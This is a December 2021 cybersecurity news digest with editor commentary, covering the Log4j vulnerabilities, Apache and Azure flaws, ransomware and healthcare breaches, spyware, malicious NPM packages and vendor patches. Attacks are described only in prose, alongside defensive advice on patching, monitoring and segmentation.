Cybersecurity News Headlines Update on December 29, 2021

Joint Log4j Cybersecurity Advisory

Attackers are “actively scanning networks to potentially exploit” Log4j vulnerabilities, according to a joint advisory issued by cybersecurity organizations from the US, the UK, Canada, Australia, and New Zealand. The advisory offers technical details, mitigations, and additional resources.

Note

  • At this point, the importance of mitigating the log4j vulnerability should be evident without this advisory. But the advisory is still useful, particularly in that it includes tools to assist in finding vulnerable log4j instances.
  • This alert consolidates information you need to know to deal with Log4j. The primary mitigation remains upgrading it where used, which means you need a current application inventory and corresponding monitoring. If you have outsourced or cloud services which haven’t let you know if or how Log4j applies to their environment, actively reach out to them for information. Did you remember to check out our ICS/OT systems for issues? If you are providing services to others, make sure you’re informing them on your actions and any actions they may need to take. Leverage the resources in the bulletin for reporting, IOCs or even if you need help getting your arms around this.

Read more in

Apache HTTPD Server Vulnerabilities

Apache has released Apache HTTP Server 2.4.52 to address two vulnerabilities. The first is a possible buffer overflow when parsing multipart content in mod_lua of Apache HTTP Server 2.4.51 and earlier; the second is a Possible NULL dereference or SSRF in forward proxy configurations in Apache HTTP Server 2.4.51 and earlier.

Note

  • Of the two vulnerabilities, the one in mod_lua is far more serious since it could in theory result in code execution. But there are two big lessons here. First, in every distro I checked, mod_lua was compiled with security features that make exploitation far harder and less likely. Second, there’s an attack surface lesson here. Very few organizations use mod_lua in Apache, yet it is enabled by default in many Linux distributions. Minimizing attack surface is foundational to security but unfortunately many distributions are expanding attack surface for the sake of compatibility. Security professionals shouldn’t just “apt install” and presume everything is optimally secure. Instead, review configurations to ensure that that package maintainers haven’t added extras you don’t need.
  • Just over 31% of public facing web servers run the Apache HTTP server. If you’re using the default httpd from your Linux distribution, make sure that you’re on a patched version, or manually install/configure the current version. If you want to stay with the built-in version and it’s running behind, you may need to update to a newer distribution.

Read more in

Azure App Service Vulnerability

Microsoft has disclosed a vulnerability in its Azure App Service for Linux. The flaw could be exploited to download files that were not intended to be public. Microsoft learned of the vulnerability from researchers at Wiz. Known as the NotLegit bug, the vulnerability has existed since September 2017. In a blog post, Microsoft writes that they have “updated all PHP images to disallow serving the .git folder as static content as a defense in depth measure.” They have also notified affected customers and updated documentation as appropriate.

Note

  • While most cloud services security incidents are enabled by admin error, this is a good reminder that vulnerabilities continue to be found in cloud services like Azure, AWS, GCP and others. File integrity and data movement monitoring is still required for business-critical executables, files and data.
  • Exposed .git directories are a common issue and they should show up in web application vulnerability scans. It also remains one of the top vulnerabilities probed in our honeypots. A little bit odd that it took so long to discover this issue.
  • If you setup a “Local Git” repository for your content delivered using the Azure App Service, those repositories were public, not private because the config file (web.config) in the .git folder was only processed by their IIS server, not Apache or other technologies used. Microsoft resolved the issue November 17th, and started notifying affected customers via email December 7th. If you were using this service, make sure that your deployed code is as expected, particularly any included authentication information such as API keys which may warrant updates.
  • This is not the first high-profile cloud platform vulnerability discovered and reported by Wiz and it certainly won’t be the last. If your org uses cloud platforms, you should be following Wiz for early notifications of vulnerabilities.

Read more in

Cyberspace Solarium Commission Will Become a Non-Profit

The Cyberspace Solarium Commission has reached the end of its term as designated in the 2019 National Defense Authorization Act (NDAA). Dozens of the commission’s recommendations have become law, including establishing the post of National Cyber Director. Leaders of the commission plan to convert it to a non-profit organization.

Note

  • Since 2019, the commission has seen 40 of their suggested measures codified into law. The move to a non-profit “think tank” changes the reporting relationship with lawmakers and they will have to use existing relationships as well as build a new working model to get more legislation on the docket. It is expected they will continue the push to get mandatory incident reporting passed next.

Read more in

Log4j Scanners

The Cybersecurity and Infrastructure Security Agency (CISA) has released Log4j-scanner, “a project derived from other members of the open-source community by CISA to help organizations identify potentially vulnerable web services affected by log4j vulnerabilities.” Other organizations and researchers have published Log4j scanners as well.

Note

  • If you don’t have a scanner, or cannot afford one, this is what you need. You can also use this to cross-check the results from your current scanner. Note that you need to additional steps, such as configuring your own DNS server to check for some of the weaknesses. Make sure you don’t miss your non-internet facing systems. The current drawbridge/moat (aka perimeter firewall) model is not the barrier it once was.

Read more in

More Healthcare Organization Breaches

West Virginia’s Monongalia Health System and Florida’s BioPlus Specialty Pharmacy Services LLC have experienced cybersecurity incidents. A phishing attack in late October compromised the protected health information (PHI) of nearly 400,000 people. BioPlus reported a server hacking incident earlier this month that affected the PHI of 350,000 people. Both incidents have been added to the US Department of Health and Human Services HIPAA Breach Reporting Tool website.

Note

  • Make sure that you terminate or otherwise deactivate inactive, defunct, or terminated user accounts, including email. Enable monitoring including “impossible access” detection. (E.g., connecting from the U.S. and abroad within a window shorter than the travel time.) Make sure that you can also detect anomalous behavior on your networks and services to include data exfiltration activities. For outsourced or cloud services have a serious conversation about what is possible. Make sure the incident response information is current and all parties know those contacts/exchanges are legitimate.

Read more in

Ransomware Attacks are Targeting QNAP NAS Devices

Ransomware operators are reportedly targeting QNAP network-attached storage (NAS) devices with the eChoraix malware. The attacks began to intensify in mid-December. It is not clear how the attackers gained access to the devices. Some users admitted that they had not adequately secures their NAS devices; others say that they were breached through a vulnerability in QNAP Photo Station.

Note

  • Remember: Never never never expose a network storage device to the internet.
  • Yes, it’s really cool to have your home storage available over the Internet; however, home NAS devices have repeatedly been found to be not up to the task. Use cloud file sharing solutions which are engineered to stand up on the Internet with strong authentication. This can also make it much easier to share files/collaborate externally securely. If you’re continuing with your current NAS devices, review the accounts regularly, keep them patched, and remove any unused or unknown applications.

Read more in

Problematic Dell BIOS Update

Recent Dell BIOS updates have reportedly been preventing laptops and desktops from booting. The affected BIOS versions are 1.14.3 for Latitude laptops, 2.8.0 for Inspiron, and 1.0.18 for Aurora R8. Dell has not yet released updated versions; users can downgrade to a previous firmware version until the updates are available.

Note

  • The trick here is that you needed not only to regression test this update, but also to test it with connected peripherals to see issues. If you pushed this out, you’ll want to roll back to version 1.13.0, which requires a bit of luck as the laptop has to be stable enough to complete the downgrade. Dell has published guidance on downgrading the BIOS. www.dell.com: Downgrading the System BIOS on a Dell System

Read more in

Fresenius Kabi Releases Updates to Address Vulnerabilities in Infusion Systems

The US Cybersecurity and Infrastructure Security Agency (CISA) has issued an ICS Medical Advisory warning of multiple vulnerabilities in Fresenius Kabi Agilia Connect Infusion Systems. The flaws could be exploited to access data, modify device settings, or perform arbitrary actions as an authenticated user. Fresenius has released updated versions of the vulnerable components.

Note

  • Look through the list of vulnerabilities and ask if you’ve made any of those same mistakes in your software engineering processes and fix them if you have. Fresenius Kabi has been communicating on this topic; make sure you’ve got the updates installed. Note that if you have an early Link+, you’ll need a hardware update to support the new firmware, contact Fresenius Kabi directly for assistance and follow the mitigations in the CISA bulletin.

Read more in

And Another (Third) Log4J Issue

Apache has once again updated Log4j, this time to version 2.17. The newest version of the logging library fixes a high-severity denial-of-service issue. The vulnerability affects all versions of Log4j from 2.0-beta9 through 2.16.0. Last week, the US Cybersecurity and Infrastructure Security Agency (CISA) directed federal agencies to patch systems or apply mitigations by Friday, December 24.

Note

As of this week, if you run Java 8, log4j 2.17.0 is the latest version fixing all known issues. For Java 7, log4j 2.12.2 should be used. As mentioned before: Keep good notes. You will have to do this again in the near future. log4j 2.15 fixes most issues, and the vulnerabilities in 2.15/16 are only exploitable if the logging configuration uses a non-default pattern layout with a context lookup. If there are critical systems still running log4j < 2.15: Patch them first before you redo the systems already at 2.15.

This is an infinite recursion bug. Essentially the function keeps being called until the host runs out of resources. I’m having flashbacks to recursive programming in college, and these are a bugger. You can either deploy Log4j 2.17, or you can change your code. The choices are to replace context lookups with thread context map patterns or remove context lookups where they originate from sources external to the application. Hint: deploy Log4j 2.17.

As more focus is given to log4j, we expect other vulnerabilities to surface. Now that you have an inventory and understanding of your attack surface as it relates to log4j, apply the patches in a cadence that matches your threat model and risk appetite.

Read more in

HHS Urges Healthcare Orgs to Address Log4j Vulnerabilities

The US Department of Health and Human Services (HHS) is urging organizations within the healthcare sector to prioritize addressing the Log4j vulnerabilities. The HHS 405(d) program Situation, Background, Assessment, Recommendation (SBAR) brief notes that the available “patch may not supply a fix for all organizations because of legacy systems that may be present in their network.”

Note

  • Healthcare remains a primary target, as is any sector perceived as over loaded and under-resourced. Spin up a team to review your security posture, include outsiders to avoid overlooking issues you’re desensitized to. Verify your monitoring is covering current and legacy systems. Make sure that your segmentation not only protects components from the primary network, but also protects the network from them.

Read more in

ICS Security Company Helps Firm Recover From Cyberattack on Building Automation System

An industrial control systems security firm brought in to help an automation engineering company deal with a major attack against a Building Automation System (BAS), which includes light switches, motion detectors, and other devices. Limes Security was able to help the engineering company regain control of the compromised components. Limes has since learned of similar attacks against BAS running on KNX BAS technology.

Note

  • Do you have resources identified to help recover from an attack like this when it happens, or do you still have an action item for someone to find a resource after the last tabletop? If you have a resource, have you had them participate in your recovery exercise to make sure the vision and reality align? Lastly, find out if they have assessment and/or best practices options you can leverage to raise the security bar.
  • Interesting case of not only a well-documented attack against building automation systems, but also a security feature used to achieve a DoS attack.

Read more in

Microsoft Urges Users to Apply Fixes for Active Directory Security Issues

In November, Microsoft released fixes for two Windows Active Directory domain service privilege escalation vulnerabilities. Earlier this month, a proof-of-concept exploit for the flaws was released. When exploited together, the flaws allow attackers to take control of vulnerable Windows domains. Microsoft’s guidance includes a “step by step guide to identify potential compromised computers via Advanced Hunting query.”

Note

  • For many organizations, the last week of December brings reduced user and customer traffic and a good chance for longer change windows. If you have that opportunity, good idea to take advantage make sure all those Windows servers have all those critical Window patches that have come out in the last few months. If there is resistance, following Microsoft threat hunting guidance first may prove to be a good way to gain backing for doing so.
  • The bulletin includes the specific events related to exploiting those vulnerabilities. Use the information to verify you’re in good shape. Also, after you apply the fixes to your domain controllers, have a serious conversation about making sure that is all those systems do, that you’re using application allow/deny lists to prevent execution of any “extra” software. Make sure that your Domain Admin accounts require MFA, particularly your Enterprise Admin.
  • These vulnerabilities may have flown under the radar with all the focus on log4j. A compromised Active Directory can lead to the entire organization being compromised. Highly recommend applying these fixes and hunting for indicators of adversary behaviors.

Read more in

Belgian Defense Ministry Networks Breached Through Log4J Vulnerability

Belgium’s Ministry of Defense says that its networks were breached through exploitation of the Log4J vulnerability. The Defense Ministry deployed “quarantine measures” to help prevent the attack from spreading. Portions of the Ministry’s network have been unavailable since Thursday, December 16.

Note

  • We have not seen a lot of reports of actual breaches caused by log4j. A lot of exploit attempts, but most of them just spray the exploit without much consideration if the exploit will actually work. This smoke screen of exploit attempts may cover up some of the more dangerous attempts.
  • Risks like this can be reduced with a properly configured WAF and appropriate monitoring to detect maleficence. Look at this as a long-term strategy, not just appropriate for Log4j. While disabling Log4j is an option, the operational impact risk is high, suggest not choosing this approach.

Read more in

FBI Warning: APT Actors Exploiting Zoho ManageEngine Vulnerability

In a December 17 TLP: White Flash bulletin, the FBI warned that “APT actors have been actively exploiting a zero-day, now identified as CVE-2021-44515, on ManageEngine Desktop Central servers.” ManageEngine parent company Zoho released a security advisory for the issue earlier this month. The Flash includes technical details, indicators of compromise, and recommended mitigations.

Note

  • The fix is to upgrade to the fixed versions now. The FBI/IC3 bulletin includes indicators and actions to take to ensure you’re not compromised as well as Yara rules to aid detection. As this is being actively exploited, don’t wait to find out the hard way that you’re compromised.

Read more in

Western Digital Urges Customers to Upgrade to My Cloud OS 5

Data storage company Western Digital is urging customers who own MyCloud devices to upgrade to My Cloud OS 5. As of January 15, 2022, “devices that are compatible with My Cloud OS 5 will no longer support prior generations of the My Cloud OS, including My Cloud OS 3.” As of April 15, 2022, Western Digital is discontinuing support for older generations of My Cloud OS. This means that users with devices incompatible with MyCloud OS 5 will no longer be able to access those devices remotely.

Note

  • Keep an eye on lifecycle, particularly on SOHO focused products. If updates are no longer available, prioritize replacing the device. As Internet accessible NAS remains a target, don’t expose it, in any fashion, to the Internet. If you want external access to your content, consider using a mainstream cloud service (Google, Microsoft, Box, etc.) which are engineered and secured for this type of access. The cost difference will be far less than an incident.

Read more in

Avast: US Federal Government Entity Network Breached

Researchers from Avast detected a cyberattack against the internal network of “a small, lesser-known U.S. federal government commission associated with international rights.” The Avast report says they reached out to the organization but after initial contact, the organization has not responded. While Avast does not have information about how the incident affected the organization or steps the organization took to mitigate the event, “based on [Avast’s] analysis of the files in question, … it’s reasonable to conclude that the attackers were able to intercept and possibly exfiltrate all local network traffic in this organization.”

Note

  • Make sure that you have published security contacts for reporting of discoveries such as this. Additionally, respond to and validate the reports, acting where needed. The last thing you want is public disclosure of weaknesses. Security through obscurity is still not a viable approach. In general US Agencies are bound by BOD 20-01 to develop and publish a vulnerability disclosure policy.

Read more in

Healthcare Sector Breach Roundup

Recently reported cyber incidents involving healthcare organizations include a telephone network and website outage at Capital Region Medical Center in Missouri; the theft of data belonging to more than 500,000 patients of Texas ENT Specialists; continuing operational disruptions at the Maryland Department of health following a cyber incident; and a ransomware attack affecting the Coombe Women and Infants University Hospital in Dublin, Ireland.

Note

  • A nice roundup to remind people that those behind most cyberattacks are not the Hollywood depicted “computer nerd,” but in fact are cold hearted criminals who do not care what damage they cause or who they hurt in order to reach their goals. During a pandemic it is unthinkable and despicable for criminals to be targeting healthcare providers.
  • This is a good roundup of incidents and responses to learn from. Even if you’re not in healthcare, read to see where you may have similar gaps in your protections as well as better understand how the attacks are initiated and spread. Ask your team what would happen at your company and how they would handle it.
  • At a minimum, clinical applications should be isolated from vulnerable applications like e-mail and browsing.

Read more in

CISA Directs Federal Agencies to Mitigate Log4j Vulnerability by Next Friday

The US Cybersecurity and Infrastructure Security Agency (CISA) to mitigate the Log4j vulnerability (CVE-2021-44228) and three other security issues by December 24, 2021 in accordance with Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities.

Note

  • Tough tasks, but a directive like this may make more resources available to deal with this issue. Note that while there are literally millions of packets attempting simple “spray” attacks, which are usually not successful, the ones you are worried about are the attacks that are targeting specific software (vCenter comes to mind). The flood of broad scanning from everybody else may provide a smoke screen for the targeted attacks.
  • This is a multistep process and is worth consideration for anyone running Log4j. Start with the verification methods (scanner and lookup) to determine if your application is vulnerable. For those which are listed in either, see if there are vendor patches you need to apply which address the Log4j weakness. For home grown, or apps without patches, apply the workarounds from the Log4j security vulnerabilities page. Use caution just replacing the Log4j library without testing so as not to introduce instability.
  • It is interesting to watch how CISA is becoming more actively involved in and leading how the US government secures its environments and responds to incidents. In many ways, this is a good thing. We need a more centralized and coordinated effort as cyber threat actors, especially nation state actors, continue to up their game.
  • Ransomware groups are starting to leverage these and it will get worse through the holiday season. Your organization should have similar plans to avoid the impact that will inevitably come from exploitation of these vulnerabilities.

Read more in

Another Log4J Update

On Tuesday, December 14, Apache released Logj4 2.16.0 (CVE-2021-45046) just days after releasing 2.15.0 to address the Log4Shell vulnerability. According to the CVE, “the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations.”

Note

  • Whatever you do to find and update vulnerable systems, keep good notes. As we discussed in our livestream on Monday, vulnerabilities like this are often the prompt researchers need to look more closely at related flaws in this library (or other libraries that use similar features).
  • Yes, you worked your butt off deploying 2.15, and doggone it you have to replace it with 2.16. Note that 2.16 disables all JNDI support by default and removes message lookup handling entirely. These are really excellent steps. JNDI has been fraught with security issues; eliminating that for most of us will be transparent. The good news is you already know where you have Log4j which should simplify deployment and testing. Validate timing and concerns with your vendors to know what update/configuration options are supported.
  • With the heightened focus on log4j, we expect multiple vulnerabilities to be discovered in the next few months.

Read more in

CISA and White House Urge Vigilance for Critical Infrastructure

The US Cybersecurity and Infrastructure Security Agency (CISA) and the White House are urging critical infrastructure owners and operators to take steps to protect their networks from cyber threats. Both the CISA publication and the White House statement offer lists of suggested actions.

Note

  • While this may sound like a broken record, critical infrastructure remains a target. Regardless of your sector, try looking for your systems, networks, etc. in a tool like Shodan. Did you find port 3389? Images of system consoles? We know the drill: use secure access gateways/VPNs, review trust relationships, MFA all external access points, and segment OT/IoT, allowing only authorized systems and users to connect. If you need a hand or advice, reach out to your local CISA office; they have resources and references.

Read more in

White House Issues Cyber Incident Disclosure Rule

A memo from the US National Security Council requires critical cybersecurity agencies to assess cyber threats to determine if they could affect critical services, such as food or fuel. In some cases, the agencies will be required to report their initial assessments to the White House within 24 hours of learning of the incidents.

Note

  • The intent is to identify areas where more resources are needed to secure systems. Ultimately, some federal funding option may emerge. While resources are typically really thin, waiting for congressional funding is not a wise move in the current threat environment. Leverage resources from your local CISA, FBI, ISAC, and peers *now* to identify and/or mitigate risks. Some, like CISA, can help with an external assessment for little to no cost.

Read more in

December Patch Tuesday

Microsoft’s monthly security updates for December 2021 comprises fixes for more than 65 vulnerabilities, including one for a zero-day flaw in AppX installer that has been used to spread Emotet malware. The batch of fixes also fixes an issue that prevented Defender for Endpoint from launching on certain systems.

Note

  • Remember patch Tuesday or were you distracted by another security concern? So far, pushing this update has been smooth and the fix to Defender not launching will relieve some of the stress caused by that issue. Make sure your team is on this update as well as the Apple updates also released. Note that the zero-day (CVE-2021-43890) in the AppX installer is being actively exploited.
  • The actively exploited vulnerability is being used by multiple initial access groups and then sold via initial access brokers to other groups including ransomware. It is a busy month for patching but try to get these done before the holidays. Many organizations try to implement year-end freezes. These should not be in scope of that.

Read more in

Japanese Ministry Wants Social Media, Search Engines, to Disclose Physical Location of User Data

Japan’s Ministry of Internal Affairs and Communications plans to submit a revision to the Telecommunications Business Law that would require social media, search engine operators and large mobile phone companies to disclose where they physically store customer data. If passed, the amendment would require those companies to identify foreign subcontractors that have access to those data.

Note

  • It is important to know where *your* data is stored when using outsourced or cloud services. From my perspective, as a US government worker, export control, because of location or potential access is a key concern, followed by proximity/latency – availability. In this case, Japan is worried about citizens’ data being stored where it cannot be adequately protected to prevent a recurrence of the breach associated with the LINEpay app. If the final version of the legislation requires that data to be stored in Japan, it will be more expensive than defining allow and deny lists of allowed storage outside the country.

Read more in

PseudoManuscrypt Spyware

According to a report from Kaspersky, spyware called PseudoManuscrypt attempted to infect more than 35,000 machines in countries around the world. Kaspersky says the attacks targeted government networks and industrial control systems (ICS) between January and November 2021.

Note

  • While the attacks have been targeted to particular countries to date, don’t assume you’re safe. This one gets installed via pirated installers, so make sure that you are using genuine installers. Verify the source and signature – use your recorded trusted source from updates, not a reference from an email or text. Make sure that your VPN is not using reusable/replayable credentials. This malware records sounds from the microphone and captures screens, keystrokes, VPN credentials, and OS event log data.

Read more in

Egyptian Politician’s iPhone Infected with Two Types of Spyware

Researchers from the University of Toronto’s Citizen Lab found that the iPhones of two Egyptians – an exiled politician and a television news show host – were infected with spyware. Both iPhones were infected with Cytrox’s Predator spyware in June 2021; the politician’s phone was also infected with NSO Group’s Pegasus spyware. Meta is removing hundreds of Facebook and Instagram accounts linked to Cytrox.

Note

  • These devices were infected prior to the releases of iOS that closed the attack vector. The report from Citizen Lab gives insight into how the devices were infected, leveraging messaging with cultural biases and claims of a trusted source, much as we see with Business Email Compromise. Make sure your messaging security training includes SMS or other message platform, e.g., WhatsApp, not just email. Mitigate future compromise by keeping devices updated. Ask your MDM provider if it can detect these compromises. Then enable it along with reporting. Replacing compromised devices and carefully restoring data (if at all) is going to be easier than attempting to clean those which have been hacked.
  • If you have been following the Verizon Data Breach Incident Report (VZ DBIR) for several years, you will notice a repeated theme in their findings when it comes to mobile devices. It’s comparatively much harder to infect a mobile device than standard computers. In fact, there are two types of mobile devices that are most commonly infected: old outdated Android devices with dodgy mobile apps and highly-targeted individuals where threat actors are willing to pay hundreds of thousands of dollars to infect the device. This is a good example of the latter.
  • I highly recommend reading Google Project Zero’s blog post on Pegasus.
    googleprojectzero: A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution

Read more in

Natural Gas Supplier Hit with Ransomware

Rochester, NY-based gas supplier Superior Plus has disclosed that its network was hit with a ransomware attack. The event began on December 12. Some of the company’s systems have been temporarily disabled.

Note

  • Threat actors are not unaware of the need for heating oil and gas during the winter; they are using every trick to ensure a payment is made. Beyond implementing security measures, make sure that your users are aware of the training you provided. Sometimes training and notification is provided ineffectively. Poll users to make sure the message is getting through. If it is not, modify the message and or delivery for success. Beware of stale security messages which will simply be ignored.

Read more in

CISA Adds Log4J to Catalog of Known Exploited Vulnerabilities

In a statement over the weekend, Cybersecurity and Infrastructure Security Agency (CISA) director Jen Easterly said, “We have added this vulnerability to our catalog of known exploited vulnerabilities, which compels federal civilian agencies — and signals to non-federal partners — to urgently patch or remediate this vulnerability.” GitHub’s list includes hundreds of affected services with links to each service’s security advisory.

Note

  • CVE-2021-44228, or log4shell as the vulnerability has been named, has kept us all pretty busy this weekend. We have only seen the beginning of what will be a vast effort to protect from this vulnerability. Most attacks are currently attempting to very simply “spray” the exploit string into frequently logged fields. Over time, attackers will get better at targeting specific software packages. We have seen a bit of this with VMware vCenter. Affected security tools present a huge target attackers will not miss to exploit. Dealing with log4shell, make sure to preserve your notes. History has shown that once a high profile vulnerability like this is found, people will look for similar issues in other tools, and also take a deeper look at the affected library. JNDI is not unique to log4j and a well-known issue. Another “lesson learned” of this still evolving incident: Secure configurations matter. The vulnerability may be mitigated by disabling the risky JNDI feature, and it looks like log4j will start shipping with it disabled by default. But for now: patch… patch… patch…
  • If you’re using Log4J 1.x, it is no longer supported, and you need to move to Log4j 2. Update to at least Log4J 2.16. Even so, you need to take actions to ensure you’re secure. Enumerate your externally facing devices with log4j installed, make sure your SOC is monitoring all the alerts from them and configure a WAF to reduce the attack surface and volume of alerts. If you have applications developed in Java and you have been contemplating migrating them to another technology you may want to execute that plan, particularly if you no longer have your Java expertise.
  • What makes this vulnerability so unique is just how ubiquitous it is (if your system, application or device is logging it could be vulnerable) but what is also unique is the attack surface. For this attack you are not remotely connecting to a specific port for a specific application, instead you are attacking any input that logs that input, such as connections to a Webserver, email filtering, etc. For an excellent overview of the attack and defenses, check out the webcast by SANS and instructors. www.youtube.com: What do you need to know about the log4j (Log4Shell) vulnerability?

Read more in

Log4Shell Exploit is Going to be Around for a Long Time

The US Cybersecurity and Infrastructure Security Agency (CISA) estimates that there are hundreds of millions of devices that are vulnerable to Log4Shell. Rob Joyce said that “The log4j vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks, even NSA’s GHIDRA. This is a case study in why the software bill of material (SBOM) concepts are so important to understand exposure.” Jake Williams said that “if you’re patching #log4j today on an Internet facing service, you need to be doing an incident response too. The reality is that someone else almost certainly beat you to it. Patching doesn’t remove the existing compromise.”

Note

  • When Log4j was introduced, it provided visibility and logging capabilities to our Java applications and services which we all leveraged and it is now included in many packages and distributions, meaning you’re going to have to work to make sure that it’s updated everywhere, particularly where embedded and you’re reliant on a third-party update. You need to take active steps to monitor and protect yourself, as well as verify you’re not already compromised. When you’re done updating, don’t turn off the monitoring.
  • It’s also important to note that if you scan for this vulnerability and discover your system is patched, make sure it was you who applied that patch. Criminals are known to patch systems they compromise to prevent others from doing the same.

Read more in

Mozilla Global Privacy Control Now Available to All Users

Mozilla has made Global Privacy Control (GPC) to all users; the specification was browser setting was rolled out on a limited basis earlier this fall. GPC tells websites not to share your personal data. The European Union’s General Data Protection Regulation (GDPR) requires GPC, but just two US states – Colorado and California – have laws that allow GPC enforcement.

Note

  • Consumer demand for increased privacy online is becoming more important to many businesses than regulatory pressure. Many software architects at consumer-facing software companies are seeing support for privacy as one of their high priority product requirements, not something security or legal teams are jamming in. As browser software vendors, Google and Mozilla are the initial touchpoint for those demands from consumers and they are both doing a good job of raising the bar on protecting users and their data.
  • This allows the browser to send a GPC opt-out signal to the far-end web site, but that web site has to have implemented code to respond to that signal, which is unlikely in areas where the legislation doesn’t apply. (E.g., not in California, Colorado, or the EU.) As this control expects the web server to have implemented controls, even when we see widespread adoption of response to GPC signals, it’s not clear this will truly be effective privacy control.

Read more in

Apple Releases Updates for Multiple OSes

Apple has released updates for multiple operating systems, including macOS, iOS, watchOS, iPadOS, and tvOS. The new iOS and iPadOS updates address 42 CVEs and adding new features including Apple Music Voice Plan, “App Privacy Report” and new “communication safety” settings intended to notify parents when their children receive or send photos that contain nudity.

Note

  • The iOS, iPadOS, watchOS, tvOS and HomePod updates fix numerous RCE, Information Disclosure and Privilege Escalation flaws. You’ll want to push this out before the holidays. The new iOS App Privacy Report (in settings under Privacy) shows which apps are accessing which sensitive items like photos, contacts, and location as well as network activity. Use this to make sure that you don’t have untended access and adjust permissions accordingly. The communication safety settings are under the Screen Time settings group and can be controlled via a separate passcode. Screen Time settings can also be shared across devices. The service is, by default, not enabled.
  • While well intentioned, the “communication safety” mechanism is likely to produce unintended consequences.

Read more in

Log4Shell Vulnerability is Being Actively Scanned for and Exploited

Attackers are scanning the Internet for vulnerable instances of Log4j. The vulnerability has been exploited to deploy ransomware and coin miners.

Note

  • I am always fascinated by what is done with an exploit. One hopes you’d detect the impact of a crypto miner immediately, but what about other anomalous behavior? Ask yourself if you have enough information about what normal is to detect changes. There are multiple lists of Log4Shell IOCs, there is a free one on GitHub you can leverage. github.com: Log4Shell-IOCs

Read more in

Ransomware Attack Hits Kronos

Kronos Private Cloud has been hit with a ransomware attack and has taken its private cloud services offline. The company is advising its customers to use “alternative business continuity protocols” until the issue is resolved. Kronos provides cloud-based solutions for workforce management and human resources.

Note

  • One of the services provided by Kronos is running payroll on behalf of their clients, this service has also been impacted. Have you considered in your BCP how your organization would manage its payroll in the event of those systems being disrupted? If not, now is the time to look into that.
  • Did you fully account for your HR or other workforce systems being offline for several weeks in your continuity of operations (COOP) plan? While the timing is never good to enact your continuity plan, the holidays this month and next provide options for time accounting which may make it easier to bridge that gap, you’re going to want to tabletop all workforce management actions to see what has to wait and what has a workaround.
  • While the vendor’s advice to “implement alternative business continuity protocols” may seem trite, business continuity planning is absolutely still a thing – even though we’ve pushed so much to SaaS/PaaS/etc. Thousands of healthcare, law enforcement, and retail organizations are whipping up Excel sheets this week to keep up operations. You always need a Plan B! Be sure to include any single point of failure in your tabletop exercises.

Read more in

Report: Irish Health Service Executive Ransomware Attack

According to a report from PWC, the ransomware attack that shut down the Irish Health Service Executive (HSE) last spring gained initial access through a phishing email. The Independent Post Incident Review says that HSE invoked its critical Incident Process once it became aware of the situation.

Note

  • This report from PWC is an excellent read for anyone involved in cybersecurity with lessons and recommendations that many organizations should take on board. Huge kudos to the HSE for publishing this report even though they were not required to do so. Open and transparent sharing of post incident reports is a key tool in us all ensuring the security and safety of our systems and the Internet.
  • This report describes factors and warning signs that were missed. Look at these to see if you’ve have missed anything. Is your endpoint-protection/anti-malware service in active blocking mode? Do you have any legacy operating systems? If so, how are you protecting them? Is your network protected from them? Are you only focused on user endpoints for security or are you including servers – particularly domain controllers? Specialized servers like these are good candidates for explicit allow and deny execution controls. How is your segmentation? Is it still intact, or has it been weakened by many exceptions? Be sure to look at resources in your sector ISOC, CISA, etc. which can provide assistance/expertise to help your budget and resources go further.

Read more in

Chrome Update Addresses Zero-Day

Google has pushed out an update for Chrome to fix a high-severity after free issue in the Chrome V8 JavaScript engine vulnerability that is being actively exploited. In all, the newest version of Chrome comprises fixes for five security issues; four are high severity and one is deemed critical. Chrome 96.0.4664.110 for Windows, Mac, and Linux will roll out over the next weeks.

Note

  • When the update is pushed Chrome has to be relaunched, monitor to make sure that happens within an acceptable window if you’re not stopping Chrome when deploying the update. While the update is scheduled to be released over a few weeks, double check to see if you can’t already download the updated version for your clients.

Read more in

CISA Warns of Flaw in Hillrom Cardio Products

The US Cybersecurity and Infrastructure Security Agency (CISA) has issued an ICS Medical Advisory regarding a vulnerability in Hillrom Welch Allyn Cardio products. The authentication bypass vulnerability affects multiple versions of several products when configured to use single sign-on.

Note

  • Until Hillrom updates are released and deployed, disable SSO on those products, ensure you’re isolating them from the business network and other systems, only allowing access by authorized systems and users, to include not exposing them directly to the Internet.

Read more in

Hellmann Working to Recover from Cyberattack

Hellmann Worldwide Logistics is recovering from a cyberattack. The company isolated its central data center after realizing its network was under attack. As of 4pm ET Monday afternoon, the company’s latest update says “[Our] business operations are largely running again and we are confident that we can eliminate remaining restrictions soon to be operating at full capacity again.”

Read more in

More Malicious NPM Packages

Malicious NPM libraries found in an open source repository appear to have been created to steal Discord access tokens and take control of infected systems. The libraries have been taken down.

Note

  • In the 2021 SANS New Threats and Attacks report, Ed Skoudis highlighted “dependency confusion” attacks as part of the overall software supply chain security issue. Like everything related to supply chain security, there are multiple areas that must be addressed – package manager configuration, software asset inventory, file integrity management, in addition to nascent efforts are having accurate and meaningful Software Bills of Material.
  • NPM is not the only repository being hit with malicious package versions, the PyPi (Python) and RubyGems (Ruby) repositories have also been hit. Make sure that your CI process includes only including vetted versions of packages, then check to make sure none of your vetted versions are listed as compromised.

Read more in

US Expected to Introduce Malicious Cyber Tool Export Restriction Initiative

The Biden administration is expected to announce an initiative that will impose restrictions on the export of technology that could be used to conduct malicious cyber activity. The Export Control and Human Rights Initiative grew out of sanctions that have been imposed on NSO Group and other organizations that make technologies that are used to violate human rights.

Note

  • Current expectations are that this will be some sort of “non-binding code of conduct” so not yet worth a lot of angst about the unintended negative consequences of export controls on “dual use technologies” related to security. But (skewing old here) in 1995, the SATAN vulnerability scanning tool built by Dan Farmer and Wietse Venema was decried as being something bad guys would use to find vulnerabilities that would lead to them attack good guys. Over time (along with other examples such as encryption and pen test tools) experience has shown that making it easier for better security tools to be in the hands of skilled defenders is more effective than making it harder for anyone (including bad guys) to obtain/use such tools.
  • Restricting the use of technology intended to violate human rights is a good thing. This initiative should align us with similar restrictions in the UK and elsewhere. Great caution must be exercised with restrictions on dual-use technology. Regulation can rapidly make cyber research as illegal as malicious exploitation.

Read more in

RCE Vulnerability in log4j Java Logging Package

A vulnerability in log4j could be exploited to allow remote code execution. Maintained by the Apache project, log4j is a popular library used to implement logging. The library supports many projects written in Java, including multiple cloud services and various open-source and commercial enterprise products. As an example, an attacker could include the exploit string as a user agent in an http request. If the web application logs the user string using log4j, log4j can be tricked into connecting to the attacker’s server, downloading addition code that will be executed by the service. The vulnerability has been assigned CVE-2021-44228.

Note

